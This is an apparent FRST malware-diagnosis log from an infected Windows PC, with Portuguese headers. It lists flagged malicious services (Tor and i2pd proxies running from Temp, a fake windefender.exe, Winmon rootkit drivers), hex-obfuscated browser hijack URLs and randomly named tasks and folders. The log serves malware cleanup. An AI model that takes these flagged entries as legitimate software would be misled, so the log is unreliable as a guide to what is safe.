BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2015-11-10] (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_171\bin\jp2ssv.dll [2018-04-27] (Oracle Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2015-11-18] (Microsoft Corporation)
BHO-x32: PDF Architect 4 Helper -> {38279E1A-7019-40C1-B579-E99DFB3312E8} -> C:\Program Files (x86)\PDF Architect 4\creator-ie-helper.dll [2016-08-05] (pdfforge GmbH)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-22] (Microsoft Corporation)
BHO-x32: YoutubeAdBlock -> {C0D38E5A-7CF8-4105-8FE8-31B81443A114} -> C:\Program Files (x86)\lJFUJMGEHIE\kw0GKrTQ.dll [2018-06-05] ()
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2015-11-10] (Microsoft Corporation)
Toolbar: HKLM-x32 - PDF Architect 4 Toolbar - {23FD9C33-A9E1-48A1-8404-E5925CF1C8E1} - C:\Program Files (x86)\PDF Architect 4\creator-ie-plugin.dll [2016-08-05] (pdfforge GmbH)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2015-02-17] (Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF DefaultProfile: 89pi56hk.default-1461610134366
FF ProfilePath: C:\Users\Alessandra\AppData\Roaming\Mozilla\Firefox\Profiles\89pi56hk.default-1461610134366 [2018-06-05]
FF Homepage: Mozilla\Firefox\Profiles\89pi56hk.default-1461610134366 -> file:///C:/ProgramData/Kipolams/ff.HP
FF NewTab: Mozilla\Firefox\Profiles\89pi56hk.default-1461610134366 -> file:///C:/ProgramData/Kipolams/ff.NT
FF SearchPlugin: C:\Users\Alessandra\AppData\Roaming\Mozilla\Firefox\Profiles\89pi56hk.default-1461610134366\searchplugins\yahoo-lavasoft.xml [2013-05-03]
FF Extension: (Adblocker para o Youtube™) - C:\Program Files (x86)\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi [2018-06-05] [Legacy] [não assinado]
FF HKLM\...\Firefox\Extensions: [[email]pdf_architect_4_conv@pdfarchitect.org[/email]] - C:\Program Files\PDF Architect 4\resources\pdfarchitect4firefoxextension
FF Extension: (PDF Architect 4 Creator) - C:\Program Files\PDF Architect 4\resources\pdfarchitect4firefoxextension [2016-11-24] [Legacy] [não assinado]
FF HKLM-x32\...\Firefox\Extensions: [{C7AE725D-FA5C-4027-BB4C-787EF9F8248A}] - C:\Program Files (x86)\PremierOpinion\firefox
FF Extension: (PremierOpinion) - C:\Program Files (x86)\PremierOpinion\firefox [2017-05-25] [Legacy] [não assinado]
FF HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Firefox\Extensions: [{87F8774F-B485-47E2-A755-A40A8A5E886D}] - C:\Users\Alessandra\AppData\Local\GAS Tecnologia\GBBD\cef\xpi
FF Extension: (GBBD Caixa Economica Federal) - C:\Users\Alessandra\AppData\Local\GAS Tecnologia\GBBD\cef\xpi [2015-12-26] [Legacy] [não assinado]
FF HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\Firefox\Extensions: [{6EBED4D8-13D9-4270-8D44-B57DDB7A787C}] - C:\Program Files (x86)\Allavsoft\Video Downloader Converter\extensions\3.15.1.6481\BVDFirefoxExt
FF Extension: (Allavsoft Video Downloader Firefox Extension) - C:\Program Files (x86)\Allavsoft\Video Downloader Converter\extensions\3.15.1.6481\BVDFirefoxExt [2018-02-09] [Legacy]
FF Plugin: @java.com/DTPlugin,version=11.171.2 -> C:\Program Files\Java\jre1.8.0_171\bin\dtplugin\npDeployJava1.dll [2018-04-27] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.171.2 -> C:\Program Files\Java\jre1.8.0_171\bin\plugin2\npjp2.dll [2018-04-27] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-12-09] (Adobe Systems)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-18] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-05-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [2018-05-17] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-05-10] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-12-09] (Adobe Systems)
FF Plugin-x32: PDF Architect 4 -> C:\Program Files (x86)\PDF Architect 4\np-previewer.dll [2016-08-05] (pdfforge GmbH)
FF Plugin HKU\S-1-5-21-1322778411-14668823-402750941-1000: gastecnologia.com.br/sf/cef -> C:\Users\Alessandra\AppData\Local\GAS Tecnologia\GBBD\npsf_cef.dll [2014-12-09] (GAS Tecnologia)
FF Plugin HKU\S-1-5-21-1322778411-14668823-402750941-1000: gastecnologia.com.br/sf/cef64 -> C:\Users\Alessandra\AppData\Local\GAS Tecnologia\GBBD\npsf_cef_64.dll [2014-12-09] (GAS Tecnologia)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\autoconf_warsaw.js [2018-06-06]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-06-06] <==== ATENÇÃO

Chrome:
=======
CHR HomePage: Default -> hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHSpwfvpaW-8yPGbWMrvJ6yLVfkroXUJ4MnSpD2UIf_GvoOZX4IaE544WiJbUw4iwVwLgiKuIyq-xD5UxiJsMD8bFj13NSVQsY2s7ErvpVe5wOB_o9ukuE2wrbpTDXjwYHbIlDqMHEB07A-WU5VnvhdKmP1Eaey9CAAIb8Wylg,
CHR StartupUrls: Default -> "hxxp://www.google.com.br/"
CHR DefaultSearchURL: Default -> hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBHN80V5Qf4-sHSpwfvpaW-8yPGbWMrvJ6yLVfkroXUJ4MnSpD2UIf_GvoOZX4IaE544WiJbUw4iwVwLgiKuIyq-xD5UxTawFo4HG5wyRIwvY6xxCXUVASk4FO2EQvlC1sJecd3d9g2lR465FcXbBhtkrYkzF7pCmL3Z5B7vbyJAE1Mbf87Rm0,&q={searchTerms}
CHR DefaultSearchKeyword: Default -> feed.sonic-search.com
CHR Profile: C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default [2018-06-06]
CHR Extension: (Apresentações) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-05]
CHR Extension: (Documentos) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-17]
CHR Extension: (Google Drive) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-18]
CHR Extension: (Web Signer) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbafmabaelnnkondpfpjmdklbmfnbmol [2018-01-08]
CHR Extension: (Adblocker para o Youtube™) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbfneagfdkkcpjojiigmahjplnbppkff [2018-06-05] [UpdateUrl: hxxps://clients88.google.com/service/update2/crx] <==== ATENÇÃO
CHR Extension: (YouTube) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-18]
CHR Extension: (Adblock Plus) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2018-05-17]
CHR Extension: (Google Search) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-18]
CHR Extension: (Allavsoft video downloader converter) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\dhancbnhabhandieicagelcddkdfgoif [2018-02-09]
CHR Extension: (Planilhas) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-05]
CHR Extension: (Documentos Google off-line) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-14]
CHR Extension: (Certisign) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\jjoehgfmpefldljiipnmgnfmcbfjkaad [2018-01-16]
CHR Extension: (Skype) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2013-05-02]
CHR Extension: (Search Manager) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\nahhmpbckpgdidfnmfkfgiflpjijilce [2018-05-25]
CHR Extension: (Bazz Search) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2018-06-05]
CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-06]
CHR Extension: (Gmail) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-18]
CHR Extension: (Chrome Media Router) - C:\Users\Alessandra\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-05-04]
CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1322778411-14668823-402750941-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [dhancbnhabhandieicagelcddkdfgoif] - C:\Program Files (x86)\Allavsoft\Video Downloader Converter\extensions\3.15.1.6481\BVDChromeExt.crx [2018-02-09]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx

==================== Serviços (Whitelisted) ====================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

R2 5850f7899b7a00e77740675180ff5f97; C:\Program Files\5850f7899b7a00e77740675180ff5f97\eafeb516191690959119ed8371b79fca.exe [1864224 2018-06-05] ()
R2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1353208 2017-06-15] (Autodesk Inc.)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [753240 2016-12-09] (Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [2321384 2018-05-11] (Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2128872 2018-05-11] (Adobe Systems, Incorporated)
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-06-05] () [Arquivo não assinado] <==== ATENÇÃO
S2 dahkService; C:\ProgramData\dahkService\dahkService.exe [423152 2018-06-05] (McAfee, Inc.)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [332656 2018-05-02] (HP Inc.)
R2 HPTouchpointAnalyticsService; C:\Program Files\HP\HP Touchpoint Analytics Client\TouchpointAnalyticsClientService.exe [332216 2017-11-24] (HP Inc.)
R2 Kipolam; C:\ProgramData\\Kipolam\\Kipolam.exe [1810944 2018-06-05] (TODO: ) [Arquivo não assinado]
S3 NBService; C:\Program Files (x86)\Nero\Nero 7\Nero BackItUp\NBService.exe [774144 2007-01-05] (Nero AG) [Arquivo não assinado]
R2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [43520 2018-06-06] () [Arquivo não assinado] <==== ATENÇÃO
R3 NMIndexingService; C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe [262144 2006-12-23] (Nero AG) [Arquivo não assinado]
R2 PassThru Service; C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [166912 2013-10-17] () [Arquivo não assinado]
S3 PDF Architect 4; C:\Program Files\PDF Architect 4\ws.exe [2438880 2016-08-05] (pdfforge GmbH)
S3 PDF Architect 4 CrashHandler; C:\Program Files\PDF Architect 4\crash-handler-ws.exe [1038048 2016-08-05] (pdfforge GmbH)
R2 PDF Architect 4 Creator; C:\Program Files\PDF Architect 4\creator-ws.exe [851168 2016-08-05] (pdfforge GmbH)
R2 PDF Architect 4 Manager; C:\ProgramData\pdfforge\PDF Architect 4 Manager\PDF Architect 4\Architect Manager.exe [972056 2016-05-18] (© pdfforge GmbH.)
R2 PremierOpinion; C:\Program Files (x86)\PremierOpinion\pmservice.exe [208320 2018-01-11] (VoiceFive, Inc.) <==== ATENÇÃO
S2 ResTCPSvc; C:\Users\Alessandra\AppData\Local\Temp\csrss\i2pd\i2pd.exe [5186560 2018-06-05] (Purple I2P) [Arquivo não assinado] <==== ATENÇÃO
S2 saiyitechnology; C:\ProgramData\yahoochrome_D\desktop66.exe [517432 2018-05-21] (PandaViewer)
R2 SamsungUPDUtilSvc; C:\Windows\SysWOW64\SecUPDUtilSvc.exe [143664 2015-12-18] ()
R2 SWUpdateService; C:\ProgramData\Samsung\SW Update Service\SWMAgent.exe [3025248 2015-07-07] (Samsung Electronics CO., LTD.)
R2 Warsaw Technology; C:\Program Files\Diebold\Warsaw\core.exe [1068376 2017-12-14] (GAS Tecnologia LTDA)
R2 WeatherLiteService; C:\Program Files (x86)\WeatherTool\2.0.1.5000183\WeatherService.exe [149136 2017-03-31] ()
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-13] (Microsoft Corporation)
R2 WinDefender; C:\Windows\windefender.exe [1435136 2018-06-05] ()
R2 66d6d2adcf3338fb0d0ff7dd431cfd88; rundll32.exe C:\Windows\zmtcxviskgfclpcu.zztcx nIgiF [X]
R2 TCPSvc; "C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\t" <==== ATENÇÃO

===================== Drivers (Whitelisted) ======================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

R3 cbfs3; C:\Windows\System32\DRIVERS\cbfs3.sys [352144 2012-04-09] (EldoS Corporation)
R1 d9f123ea30f4c200a5898caa9c1b70f5; C:\Windows\System32\drivers\d9f123ea30f4c200a5898caa9c1b70f5.sys [144696 2018-06-05] ()
S3 GemCCID; C:\Windows\System32\DRIVERS\GemCCID.sys [119680 2009-08-10] (Gemalto)
R2 SSPORT; C:\Windows\SysWOW64\Drivers\SSPORT.sys [11576 2009-10-28] (Samsung Electronics)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2015-06-17] (Apple, Inc.) [Arquivo não assinado]
S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [159936 2016-08-16] (MBB)
S3 Winmon; C:\Windows\System32\drivers\Winmon.sys [9352 2018-06-05] () [Arquivo não assinado]
S3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [23272 2018-06-05] (Windows (R) Win 7 DDK provider) [Arquivo não assinado]
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-06-05] () [Arquivo não assinado] <==== ATENÇÃO
S1 wsddfac; C:\Windows\System32\drivers\wsddfac.sys [28376 2018-06-05] (GAS Tecnologia)
R1 wsddntf; C:\Windows\System32\DRIVERS\wsddntf.sys [36984 2016-06-16] (GAS Tecnologia)
S1 wsddpp; C:\Windows\system32\drivers\wsddpp.sys [44624 2017-12-14] (GAS Tecnologia)
R3 wsddprm; C:\Windows\system32\drivers\wsddprm.sys [43560 2018-04-10] (GAS Tecnologia)
U0 aswVmm; não ImagePath
S2 DgiVecp; \??\C:\Windows\system32\Drivers\DgiVecp.sys [X]
S3 SBIOSIO; \??\C:\Users\ALESSA~1\AppData\Local\Temp\__Samsung_Update\SBIOSIO64.sys [X] <==== ATENÇÃO

==================== NetSvcs (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)


==================== Três Meses Criados arquivos e pastas ========

(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

2018-06-06 07:59 - 2018-06-06 08:00 - 000039444 _____ C:\Users\Alessandra\Desktop\FRST.txt
2018-06-06 07:59 - 2018-06-06 07:59 - 000000000 ____D C:\FRST
2018-06-06 07:58 - 2018-06-06 07:59 - 002413056 _____ (Farbar) C:\Users\Alessandra\Desktop\FRST64.exe
2018-06-06 07:48 - 2018-06-06 07:48 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\fwpra3jae2a
2018-06-06 07:48 - 2018-06-06 07:48 - 000000000 ____D C:\Program Files\DPGD3TU7OG
2018-06-06 07:46 - 2018-06-06 07:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PremierOpinion
2018-06-06 07:45 - 2018-06-06 07:45 - 000003258 _____ C:\Windows\System32\Tasks\psv_SaoLex
2018-06-05 22:50 - 2018-06-05 22:57 - 000209682 _____ C:\Windows\ntbtlog.txt
2018-06-05 22:36 - 2018-06-05 22:36 - 000013113 _____ C:\Users\Alessandra\Desktop\Explorer.lnk
2018-06-05 22:26 - 2018-06-05 22:26 - 000000000 ____D C:\Users\Alessandra\AppData\LocalLow\MAL
2018-06-05 22:24 - 2018-06-05 22:24 - 000003058 _____ C:\Windows\System32\Tasks\XLqsfoKFUKuTqG
2018-06-05 22:24 - 2018-06-05 22:24 - 000002890 _____ C:\Windows\System32\Tasks\WobUIKhuMtTTi2
2018-06-05 22:24 - 2018-06-05 22:24 - 000002872 _____ C:\Windows\System32\Tasks\KnPQHVchzdGfrlHaz2
2018-06-05 22:24 - 2018-06-05 22:24 - 000002860 _____ C:\Windows\System32\Tasks\TdqeVjasHzsikvrWtEm2
2018-06-05 22:24 - 2018-06-05 22:24 - 000002850 _____ C:\Windows\System32\Tasks\rArHIXNWKfbeRtR2
2018-06-05 22:24 - 2018-06-05 22:24 - 000000000 ____D C:\Users\Todos os Usuários\XjOPTLXDzAynQaVB
2018-06-05 22:24 - 2018-06-05 22:24 - 000000000 ____D C:\ProgramData\XjOPTLXDzAynQaVB
2018-06-05 22:24 - 2018-06-05 22:24 - 000000000 ____D C:\Program Files (x86)\wCCFxMJCsZmzC
2018-06-05 22:24 - 2018-06-05 22:24 - 000000000 ____D C:\Program Files (x86)\OxoywZINBbQwrioRGrR
2018-06-05 22:24 - 2018-06-05 22:24 - 000000000 ____D C:\Program Files (x86)\ijcQGTqqPStU2
2018-06-05 22:23 - 2018-06-05 22:23 - 000000286 __RSH C:\Users\Alessandra\ntuser.pol
2018-06-05 22:23 - 2018-06-05 22:23 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\bvohckxrv4t
2018-06-05 22:23 - 2018-06-05 22:23 - 000000000 ____D C:\Program Files\22F4FU47HD
2018-06-05 22:23 - 2018-06-05 22:23 - 000000000 ____D C:\Program Files (x86)\lJFUJMGEHIE
2018-06-05 22:22 - 2018-06-06 07:48 - 000000004 _____ C:\Users\Todos os Usuários\lock.dat
2018-06-05 22:22 - 2018-06-06 07:48 - 000000004 _____ C:\ProgramData\lock.dat
2018-06-05 22:22 - 2018-06-06 07:44 - 000000008 _____ C:\Users\Todos os Usuários\rwi.khad
2018-06-05 22:22 - 2018-06-06 07:44 - 000000008 _____ C:\ProgramData\rwi.khad
2018-06-05 22:21 - 2018-06-05 22:24 - 000000000 ____D C:\Program Files (x86)\EgDGbQEiU
2018-06-05 22:21 - 2018-06-05 22:21 - 000000000 ____D C:\Program Files (x86)\iRmKFyAZyPUn
2018-06-05 22:20 - 2018-06-05 22:20 - 397930967 _____ C:\Windows\MEMORY.DMP
2018-06-05 22:20 - 2018-06-05 22:20 - 000262144 _____ C:\Windows\Minidump\060518-27144-01.dmp
2018-06-05 22:14 - 2018-06-05 22:14 - 000000000 ____D C:\Users\Alessandra\AppData\LocalLow\agmSoNKAoyIez
2018-06-05 22:13 - 2018-06-05 22:13 - 000001889 _____ C:\Users\Alessandra\Desktop\PandaViewer.lnk
2018-06-05 22:13 - 2018-06-05 22:13 - 000000000 ____D C:\Users\Todos os Usuários\yahoochrome_D
2018-06-05 22:13 - 2018-06-05 22:13 - 000000000 ____D C:\ProgramData\yahoochrome_D
2018-06-05 22:13 - 2018-06-05 22:13 - 000000000 ____D C:\Program Files (x86)\PandaViewer
2018-06-05 22:12 - 2018-06-05 22:12 - 000003578 _____ C:\Windows\System32\Tasks\FastDataX Task
2018-06-05 22:11 - 2018-06-05 22:11 - 000003266 _____ C:\Windows\System32\Tasks\psv_Donfresh
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Users\Todos os Usuários\Logic Cramble
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\SystemHealer
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\sigqcdae4vw
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\mylj0dzpmis
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\kedvvl2dmyu
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Program Files\X4NT86L8PB
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Program Files\My Program
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Program Files\F20NRXHM4L
2018-06-05 22:11 - 2018-06-05 22:11 - 000000000 ____D C:\Program Files (x86)\FastDataX
2018-06-05 22:11 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-06-05 22:10 - 2018-06-06 07:52 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-06-05 22:10 - 2018-06-05 22:11 - 000000000 ____D C:\Program Files\D01R7PS11V
2018-06-05 22:10 - 2018-06-05 22:10 - 000000975 _____ C:\Users\Alessandra\Desktop\Speedycar.lnk
2018-06-05 22:10 - 2018-06-05 22:10 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\ytpzcu0tpuu
2018-06-05 22:10 - 2018-06-05 22:10 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\OneSystemCare
2018-06-05 22:10 - 2018-06-05 22:10 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\FastDataX
2018-06-05 22:10 - 2018-06-05 22:10 - 000000000 ____D C:\Program Files (x86)\Speedycar
2018-06-05 22:09 - 2018-06-05 22:16 - 000000000 ____D C:\Program Files (x86)\bestDownloader
2018-06-05 22:09 - 2018-06-05 22:11 - 000015602 _____ C:\Windows\SysWOW64\findit.xml
2018-06-05 22:09 - 2018-06-05 22:10 - 000000000 ____D C:\Users\Todos os Usuários\Kipolams
2018-06-05 22:09 - 2018-06-05 22:10 - 000000000 ____D C:\ProgramData\Kipolams
2018-06-05 22:09 - 2018-06-05 22:10 - 000000000 ____D C:\Program Files\5850f7899b7a00e77740675180ff5f97
2018-06-05 22:09 - 2018-06-05 22:09 - 000959488 _____ C:\Windows\zmtcxviskgfclpcu.zztcx
2018-06-05 22:09 - 2018-06-05 22:09 - 000003270 _____ C:\Windows\System32\Tasks\psv_Sumtough
2018-06-05 22:09 - 2018-06-05 22:09 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\h2a4yahxqry
2018-06-05 22:09 - 2018-06-05 22:09 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\EpicNet Inc
2018-06-05 22:09 - 2018-06-05 22:09 - 000000000 ____D C:\Users\Alessandra\AppData\Roaming\bmg5xaggxdy
2018-06-05 22:09 - 2018-06-05 22:09 - 000000000 ____D C:\Program Files\XXWL8VTRHR
2018-06-05 22:09 - 2018-06-05 22:09 - 000000000 ____D C:\Program Files\1J8EIRX58C
2018-06-05 22:09 - 2018-06-05 22:09 - 000000000 ____D C:\Program Files (x86)\bf1o5vdufsa
2018-06-05 22:08 - 2018-06-05 22:10 - 000000000 ____D C:\Users\Alessandra\AppData\Local\WhiteClick
2018-06-05 22:08 - 2018-06-05 22:08 - 001435136 ____H C:\Windows\windefender.exe
2018-06-05 22:08 - 2018-06-05 22:08 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-06-05 22:08 - 2018-06-05 22:08 - 000023272 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\WinmonFS.sys
2018-06-05 22:08 - 2018-06-05 22:08 - 000003690 _____ C:\Windows\System32\Tasks\{97FB065C-8365-8037-2DFF-FC795566A9AC}
2018-06-05 22:08 - 2018-06-05 22:08 - 000003454 _____ C:\Windows\System32\Tasks\{D9E77BE1-6B7C-88AD-F011-BB3053FAFBC7}
2018-06-05 22:08 - 2018-06-05 22:08 - 000003260 _____ C:\Windows\System32\Tasks\psv_Goodlex
2018-06-05 22:08 - 2018-06-05 22:08 - 000000003 _____ C:\Users\Alessandra\AppData\Local\wbem.ini
2018-06-05 22:07 - 2018-06-06 07:45 - 000000000 ____D C:\Users\Todos os Usuários\Kipolam
2018-06-05 22:07 - 2018-06-06 07:45 - 000000000 ____D C:\ProgramData\Kipolam
2018-06-05 22:07 - 2018-06-05 22:07 - 007627776 _____ C:\Users\Alessandra\AppData\Local\agent.dat
2018-06-05 22:07 - 2018-06-05 22:07 - 001987953 _____ C:\Users\Alessandra\AppData\Local\ScotJob.tst
2018-06-05 22:07 - 2018-06-05 22:07 - 001895384 _____ C:\Users\Alessandra\AppData\Local\DamTantax.bin
2018-06-05 22:07 - 2018-06-05 22:07 - 000126464 _____ C:\Users\Alessandra\AppData\Local\noah.dat
2018-06-05 22:07 - 2018-06-05 22:07 - 000070896 _____ C:\Users\Alessandra\AppData\Local\Config.xml
2018-06-05 22:07 - 2018-06-05 22:07 - 000018432 _____ C:\Users\Alessandra\AppData\Local\Main.dat
2018-06-05 22:07 - 2018-06-05 22:07 - 000009352 _____ C:\Windows\system32\Drivers\Winmon.sys
2018-06-05 22:07 - 2018-06-05 22:07 - 000005568 _____ C:\Users\Alessandra\AppData\Local\md.xml
